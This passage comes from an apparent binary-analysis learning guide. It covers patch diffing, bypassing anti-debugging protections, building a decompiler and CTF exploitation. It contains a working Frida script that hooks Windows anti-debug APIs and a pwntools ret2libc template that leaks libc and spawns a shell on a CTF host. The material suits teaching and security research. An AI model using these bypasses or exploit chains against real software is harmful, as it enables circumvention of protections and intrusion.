  • Finding security patches โ†’ maps to what was the vulnerability?
  • Interpreting results โ†’ maps to understanding the change

Resources for key challenges:

Key Concepts:

  • Function Matching: BinDiff documentation
  • Graph Isomorphism: Comparison algorithms
  • Patch Tuesday Analysis: Security research blogs

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Project 5 (Ghidra)

Real world outcome:

# Using ghidriff
$ ghidriff libpng-1.6.39.so libpng-1.6.40.so -o diff_report

# Output:
# Modified Functions:
#   png_read_IDAT_data (similarity: 0.87)
#     - Added bounds check at 0x1234
#     - New comparison: if (length > max_size)
#
#   png_handle_chunk (similarity: 0.95)
#     - Additional validation in switch statement
#
# New Functions:
#   png_check_chunk_length
#
# Deleted Functions:
#   (none)

# Analysis:
# The patch adds a bounds check in png_read_IDAT_data
# This fixes CVE-2023-XXXX (buffer overflow)
# Vulnerable code: memcpy without size check
# Fixed code: size validated before copy

Implementation Hints:

Binary diffing workflow:

  1. Get old and new versions of binary
  2. Export to BinDiff/Diaphora format
  3. Run the diffing tool
  4. Focus on:
    • Modified functions with low similarity
    • New validation/bounds check functions
    • Changes near memory operations

Tools:

  • BinDiff: Best for IDA Pro users
  • Diaphora: Open source, works with IDA
  • Ghidriff: Works with Ghidra, command-line
  • Ghidra Version Tracking: Built-in

Identifying security patches:

  • Look for new if statements (validation)
  • Look for changes to buffer operations
  • Look for new error handling
  • Check functions near strings like โ€œoverflowโ€, โ€œboundsโ€

Learning milestones:

  1. Diff two versions โ†’ Generate comparison report
  2. Identify changed functions โ†’ Focus on modifications
  3. Find security patches โ†’ Understand what was fixed
  4. Recreate vulnerability โ†’ Test on old version

The Core Question Youโ€™re Answering

โ€œHow do you identify what changed between two versions of a binary when you only have compiled code, and why is this the first step in finding 1-day vulnerabilities?โ€

This project explores patch analysis: when a vendor releases a security update, the binary changes but source code is rarely available. You must reverse-engineer both versions, identify differences, understand what was fixed, and potentially discover the vulnerability before attackers do.

Concepts You Must Understand First

  1. Control Flow Graph (CFG) Isomorphism
    • A CFG represents a functionโ€™s execution paths as a directed graph where nodes are basic blocks and edges are jumps/branches
    • Graph isomorphism algorithms determine if two CFGs are structurally identical even if addresses differ

    Guiding Questions:

    • How does compiler optimization affect CFG structure without changing functionality?
    • Why canโ€™t you simply compare binaries byte-by-byte?
    • What makes two functions โ€œsimilarโ€ when their assembly differs but behavior is identical?

    Book References:

    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Ch 6: Disassembly and Binary Analysis
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron - Ch 3.6: Control Flow
  2. Basic Block Hashing and Function Fingerprinting
    • Basic blocks are instruction sequences with single entry/exit points
    • Hashing creates unique fingerprints based on instruction semantics

    Guiding Questions:

    • How do you create a hash resilient to address changes but sensitive to instruction changes?
    • What happens to basic block boundaries when a single instruction is added?

    Book References:

    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Ch 5: Binary Analysis Fundamentals
  3. Structural vs. Semantic Diffing
    • Structural diffing compares code organization (CFG structure, basic block count)
    • Semantic diffing analyzes what code actually does

    Guiding Questions:

    • How can functions be structurally different but semantically identical?
    • What security patches show up in structural diff but not semantic diff?

    Book References:

    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Ch 6: Advanced Binary Analysis
  4. Call Graph Analysis
    • Call graphs map relationships between functions
    • Changes in call patterns often indicate security-relevant modifications

    Guiding Questions:

    • How does a new security check manifest in the call graph?
    • Why are changes to error-handling call paths interesting for security?

    Book References:

    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Ch 7: Advanced Static Analysis
  5. Patch Analysis Workflow
    • Systematic process: acquire binaries โ†’ analyze โ†’ diff โ†’ triage โ†’ focus on security changes

    Guiding Questions:

    • What function changes most likely indicate security fixes?
    • How do you differentiate critical security patches from benign bug fixes?

    Book References:

    • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Ch 0x300: Exploitation

Questions to Guide Your Design

  1. What matching algorithm first? Simple heuristics (function size, strings) or CFG isomorphism?

  2. How will you handle false positives? What secondary checks confirm matches?

  3. Strategy for unmatched functions? How do you analyze functions in only one version?

  4. How do you visualize results? Command-line, side-by-side disassembly, HTML reports?

  5. What metadata to extract? Beyond CFGs, what information helps disambiguate functions?

  6. Handling different compiler optimizations? How do you compare -O0 vs -O2 binaries?

  7. Triaging strategy? How do you prioritize which differences to investigate?

  8. Validating findings? How do you prove a vulnerability is exploitable?

Thinking Exercise

Manual binary diffing exercise:

Compile two versions: Version 1 with strcpy(buffer, input) and Version 2 with bounds checking. Then:

  • Disassemble both in Ghidra/IDA/radare2
  • Draw CFGs for both versions
  • Identify exact assembly differences
  • Document: V1 has single basic block, V2 has diamond pattern with conditional

The Interview Questions Theyโ€™ll Ask

  1. โ€œExplain BinDiff vs Diaphora vs Ghidriff.โ€ - BinDiff: IDA integration. Diaphora: open-source. Ghidriff: Ghidra integration.

  2. โ€œHow would you diff stripped binaries?โ€ - Use structural features: prologues, CFG structure, string refs, API calls.

  3. โ€œFunction shows 85% similarity. Same function or false positive?โ€ - Check callers/callees, strings, constants.

  4. โ€œDescribe graph isomorphism problem.โ€ - NP-intermediateโ€”use heuristics for practical performance.

  5. โ€œHow do compiler optimizations affect diffing?โ€ - Compensate with normalized sequences, semantic equivalence.

  6. โ€œWalk through Patch Tuesday analysis.โ€ - Download โ†’ diff โ†’ filter security patterns โ†’ reverse-engineer.

  7. โ€œIdentify an added bounds check?โ€ - New comparison + conditional jump creating diamond CFG.

  8. โ€œOptimizing large binary diffs?โ€ - Filter functions, use exact hashes, parallelize.

  9. โ€œDetecting use-after-free patches?โ€ - NULL checks after free, pointers set to NULL.

  10. โ€œBuild differ from scratch?โ€ - Disassembly โ†’ CFG โ†’ fingerprinting โ†’ matching โ†’ reporting.

Books That Will Help

Topic Book Chapters
Binary Analysis โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch 5-7
Control Flow โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch 3.6-3.7
Assembly โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch 4-5
Vulnerabilities โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch 0x300
Static Analysis โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch 5-6

Project 14: Anti-Debugging Bypass

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly, C, Python
  • Alternative Programming Languages: Frida scripts
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Anti-Analysis / Evasion
  • Software or Tool: x64dbg, GDB, Frida
  • Main Book: โ€œThe Art of Mac Malwareโ€ by Patrick Wardle

What youโ€™ll build: Techniques to detect and bypass anti-debugging, anti-VM, and anti-analysis protections.

Why it teaches binary analysis: Real-world malware and protected software use these tricks. Knowing how to bypass them is essential.

Core challenges youโ€™ll face:

  • Detecting debuggers โ†’ maps to IsDebuggerPresent, ptrace, etc.
  • Timing checks โ†’ maps to RDTSC, GetTickCount
  • VM detection โ†’ maps to CPUID, registry checks
  • Anti-disassembly โ†’ maps to opaque predicates, junk bytes

Resources for key challenges:

Key Concepts:

  • Windows Anti-Debugging: NtQueryInformationProcess, PEB flags
  • Linux Anti-Debugging: ptrace, /proc/self/status
  • Timing Attacks: RDTSC, clock differences

Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: Projects 4-7, debugger proficiency

Real world outcome:

# Frida script to bypass anti-debugging

import frida

jscode = """
// Bypass IsDebuggerPresent
Interceptor.replace(
    Module.getExportByName('kernel32.dll', 'IsDebuggerPresent'),
    new NativeCallback(function() {
        console.log('[*] IsDebuggerPresent called - returning false');
        return 0;
    }, 'int', [])
);

// Bypass NtQueryInformationProcess (ProcessDebugPort)
Interceptor.attach(
    Module.getExportByName('ntdll.dll', 'NtQueryInformationProcess'),
    {
        onEnter: function(args) {
            this.processInfoClass = args[1].toInt32();
            this.buffer = args[2];
        },
        onLeave: function(retval) {
            if (this.processInfoClass === 7) {  // ProcessDebugPort
                console.log('[*] ProcessDebugPort check bypassed');
                this.buffer.writeU64(0);
            }
        }
    }
);

// Bypass timing checks by hooking GetTickCount
var originalGetTickCount = Module.getExportByName('kernel32.dll', 'GetTickCount');
var lastTick = 0;
Interceptor.replace(originalGetTickCount,
    new NativeCallback(function() {
        lastTick += 100;  // Always return consistent timing
        return lastTick;
    }, 'uint', [])
);

console.log('[*] Anti-debugging bypasses installed');
"""

device = frida.get_local_device()
pid = device.spawn(['./protected.exe'])
session = device.attach(pid)
script = session.create_script(jscode)
script.load()
device.resume(pid)

Implementation Hints:

Common anti-debugging techniques:

Windows:

// Technique 1: IsDebuggerPresent
if (IsDebuggerPresent()) exit(1);

// Technique 2: PEB.BeingDebugged flag
PPEB peb = (PPEB)__readgsqword(0x60);
if (peb->BeingDebugged) exit(1);

// Technique 3: NtQueryInformationProcess
DWORD debugPort;
NtQueryInformationProcess(GetCurrentProcess(),
    ProcessDebugPort, &debugPort, sizeof(debugPort), NULL);
if (debugPort != 0) exit(1);

// Technique 4: Timing check
DWORD start = GetTickCount();
// ... code ...
DWORD end = GetTickCount();
if (end - start > 100) exit(1);  // Too slow = debugger

Linux:

// Technique 1: ptrace self-attach
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1) exit(1);

// Technique 2: Check /proc/self/status
FILE *f = fopen("/proc/self/status", "r");
// Look for TracerPid: non-zero = debugged

Bypass approaches:

  1. Patch the check: NOP out the comparison
  2. Hook the API: Return false from IsDebuggerPresent
  3. Modify environment: Clear PEB flag
  4. Use stealth debugger: ScyllaHide, TitanHide

Learning milestones:

  1. Identify techniques โ†’ Recognize anti-debugging code
  2. Static bypass โ†’ Patch checks in binary
  3. Dynamic bypass โ†’ Use hooks/plugins
  4. Write bypasses โ†’ Create reusable scripts

The Core Question Youโ€™re Answering

โ€œHow do software protections detect analysis tools, and what techniques allow you to bypass these defenses without triggering detection?โ€

This project explores the cat-and-mouse game between analysts and software protection mechanisms. Malware, DRM systems, and commercial protections use anti-debugging, anti-VM, and anti-analysis techniques to prevent reverse engineering. Learning to bypass these protections is essential for malware analysis, vulnerability research, and understanding defensive evasion.

Concepts You Must Understand First

  1. Debugger Detection Mechanisms
    • Debuggers modify process state in detectable ways: PEB flags, debug registers, timing differences
    • Windows: IsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess
    • Linux: ptrace syscall, /proc/self/status, parent PID checks

    Guiding Questions:

    • How does a debugger modify the Process Environment Block (PEB)?
    • Why can only one debugger attach to a process at a time using ptrace?
    • What happens to CPU timing when single-stepping through code?

    Book References:

    • โ€œPractical Malware Analysisโ€ by Sikorski & Honig - Ch 15: Anti-Disassembly and Anti-Debugging
    • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Ch 0x400: Debugging techniques
  2. Timing-Based Detection
    • RDTSC instruction reads CPU timestamp counter for precise timing measurements
    • Debuggers and analysis tools significantly slow execution
    • Detecting time deltas between instructions reveals analysis environments

    Guiding Questions:

    • How much slower is single-stepping compared to normal execution?
    • Can you reliably bypass RDTSC checks, and what are the techniques?
    • How do sandboxes and VMs affect timing measurements?

    Book References:

    • โ€œPractical Malware Analysisโ€ by Sikorski & Honig - Ch 15: Timing checks
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron - Ch 9: Virtual Memory (understanding timing)
  3. Virtual Machine and Sandbox Detection
    • VMs have artifacts: CPUID brand strings, MAC address patterns, specific drivers
    • Sandboxes exhibit behavioral patterns: limited execution time, restricted network
    • Detection through registry keys, WMI queries, device enumeration

    Guiding Questions:

    • What CPUID values expose that youโ€™re running in VMware or VirtualBox?
    • How do malware samples detect Cuckoo Sandbox specifically?
    • Can you make a VM completely undetectable, or is it fundamentally impossible?

    Book References:

    • โ€œPractical Malware Analysisโ€ by Sikorski & Honig - Ch 17: Anti-VM techniques
  4. Anti-Disassembly Techniques
    • Opaque predicates: jumps that always go one way but appear conditional
    • Junk bytes: instructions never executed but confuse disassemblers
    • Overlapping instructions: same bytes decoded multiple ways depending on entry point

    Guiding Questions:

    • How does an opaque predicate trick linear disassembly but not recursive?
    • What happens when you jump into the middle of a multi-byte instruction?
    • How do you recognize anti-disassembly patterns versus legitimate optimizations?

    Book References:

    • โ€œPractical Malware Analysisโ€ by Sikorski & Honig - Ch 15: Anti-Disassembly
  5. Bypass Strategies
    • Patching: NOP out detection code, modify conditional jumps
    • Hooking: Intercept API calls and return fake values (Frida, DLL injection)
    • Environment modification: Clear PEB flags, hide debugger presence
    • Stealth tools: ScyllaHide, TitanHide, custom debugger modifications

    Guiding Questions:

    • Whatโ€™s the difference between static patching and dynamic hooking?
    • When is hooking superior to patching, and vice versa?
    • How do you hide from kernel-mode anti-debugging checks?

    Book References:

    • โ€œThe Art of Mac Malwareโ€ by Patrick Wardle - Ch on Anti-Analysis (techniques apply cross-platform)

Questions to Guide Your Design

  1. Which platform first? Focus on Windows (most anti-debug techniques) or Linux (simpler, ptrace-based)?

  2. Static or dynamic bypass? Patch the binary permanently or hook APIs at runtime?

  3. Tool selection? Build custom Frida scripts, use existing tools like ScyllaHide, or manually patch?

  4. How do you test your bypasses? Create your own protected binaries or use real-world samples?

  5. Whatโ€™s your detection library? Catalog all known anti-debug techniques and their signatures?

  6. Automation strategy? Can you automatically detect and bypass common techniques?

  7. Handling kernel-mode protections? Many advanced protections run in kernel modeโ€”do you need driver development skills?

  8. Documentation approach? How do you document bypass techniques for reuse?

Thinking Exercise

Manual anti-debug identification and bypass:

  1. Analyze this code snippet:
    if (IsDebuggerPresent()) {
        ExitProcess(1);
    }
    

    Compile it and:

    • Locate IsDebuggerPresent call in disassembly
    • Identify the conditional jump following the call
    • Method 1: NOP out the jump
    • Method 2: Hook IsDebuggerPresent to return 0
    • Method 3: Clear the BeingDebugged flag in the PEB
  2. RDTSC timing check:
    rdtsc
    mov ebx, eax
    ; ... some code ...
    rdtsc
    sub eax, ebx
    cmp eax, 0x1000  ; if too slow, debugger detected
    jl normal_execution
    
    • How would you bypass this statically (patching)?
    • How would you bypass this dynamically (hardware breakpoint on rdtsc)?
  3. Document your findings:
    • Technique: ___
    • Detection signature: ___
    • Bypass method 1: ___
    • Bypass method 2: ___
    • Pros/cons of each bypass: ___

The Interview Questions Theyโ€™ll Ask

  1. โ€œExplain how IsDebuggerPresent works internally.โ€
    • Checks BeingDebugged flag in PEB at offset 0x02. Bypass: clear the flag or hook the API.
  2. โ€œWhat are PEB flags and how do they expose debuggers?โ€
    • PEB (Process Environment Block) contains NtGlobalFlag, BeingDebugged, hidden heap flags. Debuggers modify these.
  3. โ€œDescribe a timing-based anti-debugging technique.โ€
    • RDTSC before/after code section. If delta is too large, debugger detected. Bypass: hook rdtsc or use hardware breakpoints sparingly.
  4. โ€œHow would you bypass ptrace anti-debugging on Linux?โ€
    • ptrace can only attach once. Bypass: preload library that hooks ptrace to return success without actually attaching.
  5. โ€œWhatโ€™s the difference between ScyllaHide and manually patching?โ€
    • ScyllaHide dynamically hides debugger presence. Patching permanently modifies binary. ScyllaHide is reversible and works on unknown protections.
  6. โ€œExplain opaque predicates and how they break disassemblers.โ€
    • Conditions that always evaluate one way but appear dynamic. Confuse linear sweep disassembly by inserting junk code in dead branch.
  7. โ€œHow do commercial packers detect debuggers?โ€
    • Multi-layered: API checks, PEB inspection, timing, exception-based detection, VM detection. Combine multiple signals for confidence.
  8. โ€œDescribe kernel-mode anti-debugging techniques.โ€
    • Direct kernel object inspection, debug port checking, handle enumeration. Bypass requires kernel driver or virtualization.
  9. โ€œHow would you build an anti-anti-debugging framework?โ€
    • Database of known techniques โ†’ automated detection โ†’ selective bypass based on technique type โ†’ testing harness.
  10. โ€œWhatโ€™s the ethical consideration when bypassing DRM?โ€
    • Legal gray area. Legitimate uses: security research, malware analysis. Illegal uses: piracy. DMCA Section 1201 prohibits circumvention in many cases.

Books That Will Help

Topic Book Chapters
Anti-Debugging Techniques โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch 15-17
Debugger Internals โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch 0x400
Process Internals โ€œWindows Internalsโ€ by Russinovich & Solomon Part 1, Ch 3: Processes
Binary Protection โ€œThe Art of Mac Malwareโ€ by Patrick Wardle Anti-Analysis chapters
System Architecture โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch 8-9: Processes, Virtual Memory
Low-Level Details โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch 6: CPU and Memory

Project 15: Build a Decompiler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: C++, Rust
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The โ€œOpen Coreโ€ Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Program Analysis / Code Generation
  • Software or Tool: Your disassembler, LLVM (optional)
  • Main Book: โ€œCompilers: Principles, Techniques, and Toolsโ€ (Dragon Book)

What youโ€™ll build: A decompiler that converts assembly/IR back into readable C-like pseudocode.

Why it teaches binary analysis: Decompilation is the ultimate reverse engineering skill. Building one means understanding control flow, data flow, and type recovery.

Core challenges youโ€™ll face:

  • Control flow recovery โ†’ maps to if/else, loops from jumps
  • Data flow analysis โ†’ maps to variable identification
  • Type inference โ†’ maps to int vs pointer vs struct
  • Code generation โ†’ maps to producing readable output

Resources for key challenges:

Key Concepts:

  • Control Flow Graphs: โ€œEngineering a Compilerโ€ Ch. 8
  • SSA Form: โ€œEngineering a Compilerโ€ Ch. 9
  • Type Recovery: Academic papers on type inference

Difficulty: Master Time estimate: 2-3 months Prerequisites: All previous projects, compiler theory

Real world outcome:

Input (disassembly):
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x20
    mov     [rbp-0x14], edi
    mov     [rbp-0x20], rsi
    cmp     [rbp-0x14], 1
    jle     .fail
    mov     rax, [rbp-0x20]
    mov     rdi, [rax+8]
    call    atoi
    cmp     eax, 0x539
    jne     .fail
    lea     rdi, [success_msg]
    call    puts
    jmp     .end
.fail:
    lea     rdi, [fail_msg]
    call    puts
.end:
    xor     eax, eax
    leave
    ret

Output (decompiled):
    int main(int argc, char **argv) {
        int input;

        if (argc <= 1) {
            puts("Wrong!");
            return 0;
        }

        input = atoi(argv[1]);

        if (input != 1337) {
            puts("Wrong!");
            return 0;
        }

        puts("Correct!");
        return 0;
    }

Implementation Hints:

Decompilation phases:

  1. Disassembly: Convert bytes to instructions
  2. Control Flow Graph: Build graph of basic blocks
  3. Data Flow Analysis: Track value flow through registers
  4. Type Analysis: Infer types from usage
  5. Control Flow Structuring: Convert jumps to if/while
  6. Code Generation: Output C-like code

Control flow structuring algorithms:

  • If-then-else: Look for diamond patterns
  • While loops: Back edges in CFG
  • For loops: Canonical form with counter

Questions to consider:

  • How do you detect loop vs if-else?
  • How do you recover variable names?
  • How do you handle optimized code?
  • How do you represent structs?

Start simple:

  1. Handle single-block functions
  2. Add if-else handling
  3. Add while loop detection
  4. Add function call recovery
  5. Add type inference

Learning milestones:

  1. Build CFG from assembly โ†’ Basic blocks and edges
  2. Detect if-else โ†’ Diamond pattern recognition
  3. Detect loops โ†’ Back edge identification
  4. Generate readable code โ†’ Produce C-like output

The Core Question Youโ€™re Answering

โ€œHow do you transform low-level assembly instructions back into high-level readable code, and what makes decompilation fundamentally harder than compilation?โ€

This project tackles one of the most challenging problems in reverse engineering: recovering source-like code from compiled binaries. Unlike disassembly (which just translates machine code to assembly), decompilation attempts to reconstruct higher-level abstractions like if/while statements, function calls, and even variable types. This is the technology behind IDAโ€™s Hex-Rays and Ghidraโ€™s decompiler.

Concepts You Must Understand First

  1. Control Flow Graph (CFG) Construction
    • CFG is a directed graph where nodes are basic blocks and edges represent jumps
    • Basic block: maximal sequence of instructions with single entry and single exit
    • CFG is the foundation for all decompilationโ€”it represents program structure

    Guiding Questions:

    • How do you identify basic block boundaries from assembly?
    • What happens to the CFG when indirect jumps (jump tables) are present?
    • How do you handle overlapping code or self-modifying code?

    Book References:

    • โ€œEngineering a Compilerโ€ by Cooper & Torczon - Ch 8: Introduction to Optimization
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron - Ch 3: Machine-Level Representation
  2. Static Single Assignment (SSA) Form
    • SSA: each variable assigned exactly once, making data flow explicit
    • Phi functions merge values at control flow join points
    • SSA simplifies many analyses: dead code elimination, constant propagation, type inference

    Guiding Questions:

    • Why is SSA form useful for decompilation?
    • How do you convert assembly to SSA form?
    • What are phi functions and when do you need them?

    Book References:

    • โ€œEngineering a Compilerโ€ by Cooper & Torczon - Ch 9: Data-Flow Analysis
  3. Control Flow Structuring
    • Converting arbitrary jumps into if/else, while, for, switch statements
    • Some CFGs cannot be perfectly structured (irreducible graphs)
    • Algorithms: interval analysis, structural analysis, phoenix algorithm

    Guiding Questions:

    • How do you recognize an if-then-else pattern in a CFG (diamond shape)?
    • How do you detect loops (back edges in the CFG)?
    • What do you do with goto-spaghetti that canโ€™t be structured?

    Book References:

    • โ€œCompilers: Principles, Techniques, and Toolsโ€ (Dragon Book) - Ch 9: Machine-Independent Optimizations
    • Research papers on control flow structuring algorithms
  4. Type Inference and Recovery
    • Assembly has no typesโ€”everything is bits and bytes
    • Type inference uses data flow, operations, and usage patterns
    • Challenge: distinguishing int from pointer from struct

    Guiding Questions:

    • If a value is dereferenced, what does that tell you about its type?
    • How do you recover struct layouts from memory access patterns?
    • Can you perfectly recover types, or is it fundamentally ambiguous?

    Book References:

    • Research papers on type inference in binary analysis
    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Ch 7: Advanced Static Analysis
  5. Data Flow Analysis
    • Tracking how data moves through the program
    • Reaching definitions, live variables, available expressions
    • Used for variable name recovery and optimization

    Guiding Questions:

    • How do you identify that two register uses refer to the same logical variable?
    • What is def-use chain analysis?
    • How does data flow analysis help with decompilation quality?

    Book References:

    • โ€œEngineering a Compilerโ€ by Cooper & Torczon - Ch 9: Data-Flow Analysis
  6. Code Generation
    • Converting structured control flow and typed variables into readable C-like code
    • Pretty-printing, variable naming, comment generation
    • Balancing accuracy vs readability

    Guiding Questions:

    • How do you generate readable variable names when originals are lost?
    • Should you preserve all assembly details or simplify for readability?
    • How do you handle assembly idioms (e.g., xor eax, eax for zeroing)?

    Book References:

    • โ€œCompilers: Principles, Techniques, and Toolsโ€ (Dragon Book) - Ch 8: Code Generation

Questions to Guide Your Design

  1. What IR (Intermediate Representation)? Use LLVM IR, custom IR, or work directly on assembly?

  2. How much do you simplify? Preserve every assembly detail or aggressively simplify to C-like code?

  3. Handling irreducible control flow? Use goto statements or try to restructure?

  4. Type system depth? Simple (int/pointer), or full (structs, arrays, function pointers)?

  5. Variable naming strategy? Generic (var1, var2) or heuristic-based (counter, buffer)?

  6. Testing approach? Compile simple C programs, decompile, compare with source?

  7. Performance vs accuracy? Fast but imperfect, or slow but highly accurate?

  8. Scope of support? Single functions or whole-program analysis with interprocedural optimization?

Thinking Exercise

Manual decompilation exercise:

  1. Given this assembly:
    push rbp
    mov  rbp, rsp
    sub  rsp, 16
    mov  DWORD PTR [rbp-4], 0    ; local var at rbp-4
    .L2:
    cmp  DWORD PTR [rbp-4], 9
    jg   .L3
    mov  eax, DWORD PTR [rbp-4]
    mov  edi, eax
    call print_number
    add  DWORD PTR [rbp-4], 1
    jmp  .L2
    .L3:
    leave
    ret
    
  2. Manual decompilation steps:
    • Identify basic blocks (entry, loop body, exit)
    • Draw the CFG (entry โ†’ loop โ†’ exit, with back edge)
    • Recognize loop pattern (back edge from .L2 to itself)
    • Identify loop counter ([rbp-4])
    • Translate to C:
      void function() {
          int i = 0;
          while (i <= 9) {
              print_number(i);
              i++;
          }
      }
      
  3. Document:
    • CFG: 3 blocks, 1 back edge
    • Loop type: while loop (could be for loop)
    • Variables: i (int, local at rbp-4)
    • Function calls: print_number(int)

The Interview Questions Theyโ€™ll Ask

  1. โ€œWhatโ€™s the difference between disassembly and decompilation?โ€
    • Disassembly: machine code โ†’ assembly (1:1 mapping). Decompilation: assembly โ†’ high-level code (many:1, lossy).
  2. โ€œExplain SSA form and why itโ€™s used in decompilers.โ€
    • SSA: each variable assigned once. Simplifies data flow analysis, makes variable usage explicit, enables optimizations.
  3. โ€œHow do you detect a for loop vs while loop vs do-while in assembly?โ€
    • Pattern recognition in CFG: for has initialization, condition, increment. While: condition at start. Do-while: condition at end.
  4. โ€œWhat makes control flow structuring hard?โ€
    • Irreducible graphs (canโ€™t be structured without goto), optimizations create complex patterns, jump tables are indirect.
  5. โ€œHow would you infer that a variable is a pointer vs an integer?โ€
    • Pointer: dereferenced, used in lea, compared to addresses. Integer: used in arithmetic, compared to constants.
  6. โ€œWhatโ€™s a phi function in SSA form?โ€
    • Merges values from different control flow paths. Example: at loop header, phi(initial_value, updated_value).
  7. โ€œExplain how youโ€™d recover a struct from memory accesses.โ€
    • Group accesses by base pointer + offset. Offsets reveal field positions. Access types (byte/word/qword) reveal field sizes.
  8. โ€œWhy canโ€™t decompilation be perfect?โ€
    • Information loss: variable names, comments, types, macros lost. Optimization obfuscates structure. Multiple source codes compile to same assembly.
  9. โ€œHow would you handle switch statements with jump tables?โ€
    • Detect: computed jump through table. Extract table from data section. Each entry is a case. Reconstruct switch statement.
  10. โ€œWalk me through decompiling a simple function from scratch.โ€
    • Disassemble โ†’ build CFG โ†’ identify control structures โ†’ convert to SSA โ†’ type inference โ†’ code generation โ†’ pretty print.

Books That Will Help

Topic Book Chapters
Control Flow Analysis โ€œEngineering a Compilerโ€ by Cooper & Torczon Ch 8-9
Compiler Fundamentals โ€œCompilers: Principles, Techniques, and Toolsโ€ (Dragon Book) Ch 8-9
Binary Analysis โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch 6-7
Machine-Level Details โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch 3
Assembly Language โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch 4-5
Advanced Topics Research papers on decompilation โ€œNative x86 Decompilation Using Semantics-Preserving Structural Analysisโ€
โ€œNo More Gotos: Decompilation Using Pattern-Independent Control-Flow Structuringโ€

Project 16: CTF Binary Exploitation Practice

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Shell scripting
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 3: Advanced
  • Knowledge Area: CTF / Competitive Hacking
  • Software or Tool: pwntools, Docker, CTF platforms
  • Main Book: โ€œCTF Field Guideโ€ (Trail of Bits)

What youโ€™ll build: Solve 20+ CTF pwn challenges from various difficulty levels, building a personal exploit template library.

Why it teaches binary analysis: CTF challenges are designed to teach specific concepts. They provide immediate feedback and gamified learning.

Core challenges youโ€™ll face:

  • Various vulnerability types โ†’ maps to stack, heap, format string
  • Different protections โ†’ maps to ASLR, NX, canary, PIE
  • Time pressure โ†’ maps to efficient analysis workflow
  • Novel techniques โ†’ maps to learning new tricks

Resources for key challenges:

Key Concepts:

  • Challenge Categories: CTF101.org
  • Exploit Primitives: โ€œThe Shellcoderโ€™s Handbookโ€
  • Advanced Techniques: CTF writeups

Difficulty: Advanced Time estimate: Ongoing (2+ months) Prerequisites: Projects 7-8 (Buffer Overflow, ROP)

Real world outcome:

# Exploit template
from pwn import *

# Configuration
binary = './challenge'
libc = './libc.so.6' if args.REMOTE else '/lib/x86_64-linux-gnu/libc.so.6'
host, port = 'challenge.ctf.com', 1337

# Setup
elf = context.binary = ELF(binary)
libc = ELF(libc)

def conn():
    if args.REMOTE:
        return remote(host, port)
    elif args.GDB:
        return gdb.debug(binary, '''
            break main
            continue
        ''')
    else:
        return process(binary)

# Gadgets
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Exploit
def exploit():
    p = conn()

    # Stage 1: Leak libc
    payload = flat({
        0x48: pop_rdi,
        0x50: elf.got['puts'],
        0x58: elf.plt['puts'],
        0x60: elf.symbols['main']
    })

    p.sendlineafter(b'> ', payload)
    leak = u64(p.recvline().strip().ljust(8, b'\x00'))
    libc.address = leak - libc.symbols['puts']
    log.success(f'libc base: {hex(libc.address)}')

    # Stage 2: Shell
    payload = flat({
        0x48: ret,
        0x50: pop_rdi,
        0x58: next(libc.search(b'/bin/sh')),
        0x60: libc.symbols['system']
    })

    p.sendlineafter(b'> ', payload)
    p.interactive()

if __name__ == '__main__':
    exploit()

Implementation Hints:

Progression path:

  1. Stack challenges: Buffer overflow, ret2win
  2. ROP challenges: ret2libc, ROP chains
  3. Format string: Read/write primitives
  4. Heap challenges: Use-after-free, heap overflow
  5. Advanced: House of Force, tcache poisoning

Build your template library:

  • leak_libc.py - Standard libc leak pattern
  • rop_chain.py - ROP chain builder
  • format_string.py - Format string exploit
  • heap_exploit.py - Heap exploitation patterns

Practice platforms:

  • pwnable.kr (beginner-friendly)
  • ROP Emporium (ROP-focused)
  • pwnable.tw (advanced)
  • picoCTF (beginner)

Learning milestones:

  1. Solve 10 stack challenges โ†’ Master buffer overflows
  2. Solve 5 ROP challenges โ†’ Bypass NX
  3. Solve 5 format string โ†’ Arbitrary read/write
  4. Attempt heap challenges โ†’ Enter advanced territory

The Core Question Youโ€™re Answering

โ€œHow do you systematically discover and exploit vulnerabilities in compiled binaries, and why are CTF challenges the fastest way to master binary exploitation?โ€

